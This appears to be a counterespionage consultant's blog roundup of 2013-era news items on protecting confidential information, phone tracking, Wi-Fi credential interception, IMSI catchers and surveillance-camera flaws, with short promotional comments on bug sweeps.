An abridged overview by Jim Lindell, President, Thorsten Consulting Group Inc.... First, the company must establish values and principles that define appropriate behavior regarding confidential information such as personnel, technologies, customers and suppliers. Once values and policies have been established, management must support, review and enforce them.
Second, make sure the hiring process emphasizes how employees must handle confidential information. Determine the candidate's ability to maintain confidentiality. How? By asking tough questions during the interview and doing thorough background checks.
After the employee is hired, continue training and explaining your policies and procedures regarding confidential information. The role of the CEO and senior management can't be overstated.
The CEO, on a regular basis, should highlight unacceptable public behavior and emphasize that it won't be tolerated. The Snowden/Manning incidents provide excellent examples that illustrate confidentiality expectations for all employees. At a minimum, these messages must come from the CEO at last once a year.
The best policies and procedures To be effective, policies and procedures must: • Reinforce acceptable behavior. • Create a monitoring process to detect breaches in confidential information. (An integral part of a TSCM bug sweep.) • Create an audit process to determine whether existing rules are being followed. (An integral part of a TSCM bug sweep.) You must assess the nature of confidential information that is maintained and the potential for abuse. Both Snowden and Manning required technological tools and technological skills. You must understand the devices your employees are using, and how they can use them to access confidential information...
In addition to electronic access to your systems, you also must be aware of people who have physical access. The ability to take pictures of processes, documents and employees has changed dramatically. You must restrict access to your plant and offices.
Finally, it's important to establish policies and procedures that address disposal of equipment like computers, tablets, hard disk drives and flash drives. Since we can't see the digital information, it's easy to discard hardware and not realize what we're actually tossing out.
All businesses are at risk. Some are just more prepared than others. (more)
Smartphones should soon be able to charge themselves
using transparent Wysips Crystal photovoltaic panels bonded into their screens. And if the idea takes off, tablets and eventually whole buildings could follow... (more) (more including photovoltaic clothing) Imagine... The bug hidden in the picture frame would never have to have its battery replaced.
Tech-savvy criminals try to evade being tracked by changing their cellphone's built-in ID code and by regularly dumping SIM cards. But engineers in Germany have discovered that the radio signal from every cellphone handset hides within it an unalterable digital fingerprint — potentially giving law enforcers a simple way of tracking the handset itself.
Developed by Jakob Hasse and colleagues at the Technical Univ. of Dresden the tracking method exploits the tiny variations in the quality of the various electronic components inside a phone.
When analogue signals are converted into digital phone ones, the stream of data each phone broadcasts to the local mast contains error patterns that are unique to that phone's peculiar mix of components. In tests on 13 handsets in their lab, the Dresden team were able to identify the source handset with an accuracy of 97.6 percent. (more)
Smartphones running Microsoft's Windows Phone operating system are vulnerable to attacks that can extract the user credentials needed to log in to sensitive corporate networks, the company warned Monday...
"An attacker-controlled system could pose as a known Wi-Fi access point, causing the victim's device to automatically attempt to authenticate with the access point and in turn allowing the attacker to intercept the victim's encrypted domain credentials," the Microsoft advisory warned. "An attacker could then exploit cryptographic weaknesses in the PEAP-MS-CHAPv2 protocol to obtain the victim's domain credentials." (more)
Turn on certificate requirement before connecting to WPA2 networks. Now.
Brendan O’Connor is a security researcher. How easy would it be, he recently wondered, to monitor the movement of everyone on the street – not by a government intelligence agency, but by a private citizen with a few hundred dollars to spare?
Mr. O’Connor, 27, bought some plastic boxes and stuffed them with a $25, credit-card size Raspberry Pi Model A computer and a few over-the-counter sensors, including Wi-Fi adapters. He connected each of those boxes to a command and control system, and he built a data visualization system to monitor what the sensors picked up: all the wireless traffic emitted by every nearby wireless device, including smartphones.
Each box cost $57. He produced 10 of them, and then he turned them on – to spy on himself. He could pick up the Web sites he browsed when he connected to a public Wi-Fi – say at a cafe – and he scooped up the unique identifier connected to his phone and iPad. Gobs of information traveled over the Internet in the clear, meaning they were entirely unencrypted and simple to scoop up.
Even when he didn’t connect to a Wi-Fi network, his sensors could track his location through Wi-Fi “pings.” His iPhone pinged the iMessage server to check for new messages. When he logged on to an unsecured Wi-Fi, it revealed what operating system he was using on what kind of device, and whether he was using Dropbox or went on a dating site or browsed for shoes on an e-commerce site. One site might leak his e-mail address, another his photo.
“It could be used for anything depending on how creepy you want to be,” he said.
You could spy on your ex-lover, by placing the sensor boxes near the places the person frequents, or your teenage child, or the residents of a particular neighborhood. You could keep tabs on people who gather at a certain house of worship or take part in a protest demonstration in a town square. Their phones and tablets, Mr. O’Connor argued, would surely leak some information about them – and certainly if they then connected to an unsecured Wi-Fi. The boxes are small enough to be tucked under a cafe table or dropped from a hobby drone. They can be scattered around a city and go unnoticed. (more) (Want your own CreepyDOL?) Yet another thing a TSCM survey could uncover for you.
Remember this post from June? --- The news media is overflowing with reports of "High Tech" car burglars. They
appear to be opening locked cars while holding a "black box" which "has
police all over the nation stumped as to how it works."
Here, at the Spybusters Countermeasures Compound, we believe the black box is nothing more than a radio signal jammer. --- The spybusters tracked down the tool they probably used to pull off the heists...
The detention by Chinese authorities of a British corporate investigator and his American wife in the wake of a corruption probe into pharmaceutical giant GlaxoSmithKline has had a chilling effect on other risk consultants working in China.
It's unclear why Peter Humphrey and Yu Yingzeng, whose firm ChinaWhys has done work for GSK and other drug makers, were detained. But corporate investigators said they were concerned about the repercussions for the industry.
Multinationals, banks and investors rely on corporate investigators for information about potential partners and investments in China, where a lack of transparency is a hurdle to doing business. Restrictions in the flow of such background information could potentially leave foreign investors exposed to greater risk in the world's second-largest economy. (more)
Canada - Men are forced to use the women’s washroom at Peterborough city hall when council is in closed door meetings. The reason? Fear of people eavesdropping.
Peterborough city council thinks there is more than one kind of leak happening in the men’s bathroom.
City officials are closing down the washroom — which shares a wall with council chambers — for fear that people could eavesdrop on proceedings.
That means men needing the washroom during any closed-door meeting are being asked to use the ladies’ room instead — and a security guard is positioned in the hallway to make sure of that.
City clerk John Kennedy defended the decision to close down the washroom, saying it happens whenever there is a confidential meeting. (more)
In a significant victory for law enforcement, a federal appeals court on Tuesday said that government authorities could extract historical location data directly from telecommunications carriers without a search warrant.
The ruling is the first that squarely addresses the constitutionality of warrantless searches of the historical location data stored by cellphone service providers. (more)
A major Russian newspaper reported that Moscow’s metro system is planning what appears to be a mobile phone tracking device in its metro stations—ostensibly to search for stolen phones.
According to Izvestia (Google Translate), Andrey Mokhov, the operations chief of the Moscow Metro system’s police department, said that the system will have a range of five meters (16 feet). “If the [SIM] card is wanted, the system automatically creates a route of its movement and passes that information to the station attendant,” Mokhov said.
Many outside experts, both in and outside Russia, though, believe that what local authorities are actually deploying is a “stingray,” or “IMSI catcher”—a device that can fool a phone and SIM into reading from a fake mobile phone tower. (IMSI, or an International Mobile Subscriber Identity number, is a 15-digit unique number that sits on every SIM card.) Such devices can be used as a simple way to see what phone numbers are being used in a given area or even to intercept the audio of voice calls. (more)
"According to the Max Planck Institute, you're 100 times more likely to be surveilled by your own government if you live in the Netherlands or you live in Italy," Baker said.
"You're 30 to 50 times more likely to be surveilled if you're a French or a German national than in the United States." (more)
India - Verint's leadership team recently met communications minister Kapil Sibal
in Israel and indicated the company's desire to work with the
government to intercept all forms of encrypted communications to address
India's cyber security needs.
Sibal has also apprised Israel's
IT & communications minister Gilad Erdan about engaging Verint to
implement an interception solution. "Verint is willing to work with the
Indian government to address the issue of intercepting encrypted
communications like Gmail, Yahoo-. mail and others. It will shortly
co-ordinate with DoT's security wing and CERT-In teams to implement a customized interception solution," says an internal telecom department
note, a copy of which was reviewed by ET. (more)
But wait! There's more!
India - Worried over increasing tiger deaths each year and many due to poaching
and poisoning, India plans to start round-the-clock electronic surveillanceof some of the tiger habitats using high definition cameras. (more)
A US security expert says he has identified ways to remotely attack high-end surveillance cameras used by industrial plants, prisons, banks and the military, something that could potentially allow hackers to spy on facilities or gain access to sensitive computer networks. Craig Heffner, a former software developer with the National Security Agency (NSA) who now works for a private security firm, said he discovered the previously unreported bugs in digital video surveillance equipment from firms including Cisco, D-Link and TRENDnet... He plans to demonstrate techniques for exploiting these bugs at the Black Hat hacking conference, which starts on July 31 in Las Vegas.